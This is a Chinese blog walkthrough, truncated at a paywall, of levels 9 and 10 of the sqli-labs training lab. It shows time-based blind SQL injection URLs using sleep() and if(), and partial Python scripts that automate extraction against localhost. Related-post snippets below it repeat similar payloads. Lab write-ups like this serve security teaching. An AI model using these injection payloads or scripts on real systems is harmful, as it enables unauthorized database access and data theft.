sqli-labs第九关&第十关(延时盲注)

最新推荐文章于 2025-07-10 21:54:36 发布
最新推荐文章于 2025-07-10 21:54:36 发布
阅读量1.4k 收藏 10
点赞数 7
CC 4.0 BY-SA版权
分类专栏: sqliabs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42266432/article/details/119814142
本文介绍了如何利用时间盲注技术解决sqli-labs的第九关和第十关。通过观察请求延迟,结合if语句与sleep函数,编写Python脚本来自动进行延时盲注,最终成功过关。第十关需注意字符串引用的差异。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

刚开始进入这一关时对这一关进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标题,第九关叫"time based-single quotes"基于时间—单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下:

http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+

然后发现这个请求延时了3S
在这里插入图片描述
进行到这里,就有了一套完整的思路,时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI界面的变化判断真假,延时盲注靠请求的延时发出判断真假,先手工注入一个:

http://localhost:90/sqli-labs-master/Less-8/?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='e',sleep(2),1)--+

在这里插入图片描述
可以看到,请求被延时了2S,可行
这里使用的if(expr1,expr2,expr3),expr1为真则执行2,为假则执行3,加上sleep方法即可让我们判断条件的真假,requests库中elapsed方法可返回响应时间,使用elapsed.total_seconds()得到响应时间单位为S,知道这些就可以写个简单的脚本自动注入,代码如下:

import requests


# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://localhost:90/sqli-labs-master/Less-9/?id=1' and if(length(database())>{
     
     i},1,sleep(2))"
        r = requests.get(url + '%23')
        if r.elapsed.total_seconds()>2:
            print('database_length:', i)
            return i


#获取数据库名
def database_name(databaselen)
最低0.47元/天 解锁文章

200万优质内容无限畅学
sqli-labs-master闯游戏第九
FourthGuy的博客
10-09 2271
文章目录前言一、Less-9分析下源码中的函数总结 前言 本题用到了在第八介绍的两个函数 ascii()和substring(),和两个新的函数sleep(),if() 大家第一次接触后一定要反复练习,并且思考为什么要这么做 一、Less-9 惯例,我们先写以下语句 ?id=1 接着 ?id=1' ?id=1" 发现返回的资源都是上面的样子 猜想可能是闭了报错,且无论语句正确与否返回的结果都是相同的 我们尝试基于时间入 这里介绍两个函数 sleep()参数写数字,此函数用于将时间延迟.
sqli-labs靶场9-10时间
qq_46527080的博客
12-12 1390
知识点 函数 if()函数 条件判断函数 if(a,b,c) if判断句,a为条件,b、c为执行语句;如果a为真就执行b,a为假就执行c; sleep()函数 网页延迟n秒后,输出结果 left()函数 从左边数,取几个数 例如:left(abcdef,3) 取3位左边的数,就是abc 第九 源码分析: 开搞 一、判断入点(需要用到sleep函数) ?id=1')and (sleep(4)) --+ (耗时2s,这是正常的页面,没有闭合的页面) ?id=1'an
sqli-labs:第九
J_linnb的博客
05-03 1411
【代码】sqli-labs:第九
SQLi-LABS第九
最新发布
fristchoice的博客
07-10 742
摘要:本文详细记录了针对一个SQL入漏洞的完整测试流程。首先通过参数测试判断入类型为字符型时间,然后逐步获取数据库信息:确定表列数为3,获取数据库名security,枚举4个表名(email、referers、uagents、users),解析users表的字段结构(id、username、password),最终通过时间延迟技术获取具体用户数据。整个过程展示了从基础入检测到完整数据提取的技术细节,最终成功获取数据库全部敏感信息。
sqli-labs靶场第九
gou1791241251的博客
12-26 1668
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时入 此时发现确实延迟了十秒页面才能正常响应,延时入是布尔的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六,把条件换成沉睡10秒即可。 ...
sqli-labs第九
qq_56726035的博客
04-08 837
sqli-labs第九
Sqlilabs-9
KAKA的博客
07-07 541
第九是基于时间,所以这里放过程图片没啥卵用了,直接上payload 思路大致如下: count(*)得到表个数 --> 各个表长度 --> 猜测表名 count(*)得到列个数 --> 各个列长度 --> 猜测列名 得到数据的思路同上↑ 这里提供几个正确的 payload : 得到第一张表的第一个字母: http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information_
sql手工入——sqli-labspage第六第十
m0_75036923的博客
08-18 1455
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表的第一个字段的第一位字符ascii码为105 'i'
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 9197
下面选取几个具有代表性的卡,演示几种 SQL 入漏洞利用方法。
sqli-labs第九脚本解释
01-22
sqli-labs第九是一个延时的挑战。在这个挑战中,你需要通过入语句来判断条件是否为真,并通过延时来判断入是否成功。 根据你提供的信息,你尝试了时间的方法。你使用了单引号来闭合入语句,并在...
SQLI-labs-第九第十
weixin_54055099的博客
04-14 1087
sqlilab 第9和第10时间
SQL入:sqli-labs靶场通第九 时间
l258282的博客
12-05 2079
网络安全。
sqli-labs卡9(基于get提交的单引号闭合的时间)思路
zyh1588的博客
10-31 1089
小白回顾sqli-labs靶场第九(时间)
SQL入之sqli-labs(九)
m0_60716947的博客
04-30 379
目录 (九)第五十四到六十五 (1)第五十四 (2)第五十五 (3)第五十六 (4)第五十七 (5)第五十八 (6)第五十九 (7)第六十 (8)第六十一 (9)第六十二 (10)第六十三 (11)第六十四 (12)第六十五 (十)sqli-labs 总结 (九)第五十四到六十五 (1)第五十四 首页提醒我们使用id 值进行入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
sqli-labs-------第八、九
wyzhxhn的博客
11-09 325
布尔时间
【针对sqli-labs第9时间python脚本】
AA8j的博客
09-09 874
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
第九的原理方法
2401_82770182的博客
04-22 206
第九会发现我们不管输入什么页面显示的东西都是一样的,这个时候布尔就不适合我们用,布尔适合页面对于错误和正确结果有不同反应。判断所有字段名的长度。
sqli-labs-master第九+第十时间延迟入)
m_ing
05-11 1214
前言:时间型的入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合 这两需要用到的函数: 函数名称 函数说明 sleep (s) 静止s秒、数字类型,可自定义 if(逻辑表达式,返回值1,返回值2) if判断语句 来到第九: http://192.168.89.131/sqli-labs-master/Less-9/ 当我们正常的测试语句似乎没有任何效果时。我们根据总结的
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2337
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL-时间(Time-based blind)
sqli-labs第九时间注脚
02-11
### sqli-labs 第九 时间解决方案 针对 sqli-labs第九时间挑战,编写自动化脚本是有效的方法之一。由于时间的特点,在入过程中只能通过猜测并验证数据库响应时间来推断数据[^2]。 #### Python 脚本实现时间攻击 下面是一个基于Python的时间攻击脚本示例: ```python import requests import string url = "http://localhost/sqli/Less-9/?id=1" true_string = 'Welcome' charset = string.digits + string.ascii_lowercase + string.ascii_uppercase + "!@#$%^&*()-_=+[]{}|;:,.<>?/~`" def check(payload): res = requests.get(url + payload) return true_string not in res.text database_name_length = 0 for i in range(1, 20): payload = f"' AND IF(LENGTH(database())={i}, sleep(5), 0)-- " if check(payload): database_name_length = i break print(f"Database name length is {database_name_length}") database_name = '' for i in range(1, database_name_length + 1): for char in charset: payload = f"' AND IF(SUBSTRING(database(),{i},1)='{char}',sleep(5),0)-- " if check(payload): database_name += char print(f"[+] Found character: {char}") break print(f"The database name is '{database_name}'") ``` 此段代码实现了对数据库名称长度及其具体内容的提取过程。首先确定数据库名的总字符数,再逐位猜解每一位上的具体字符直至完成整个字符串重建工作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值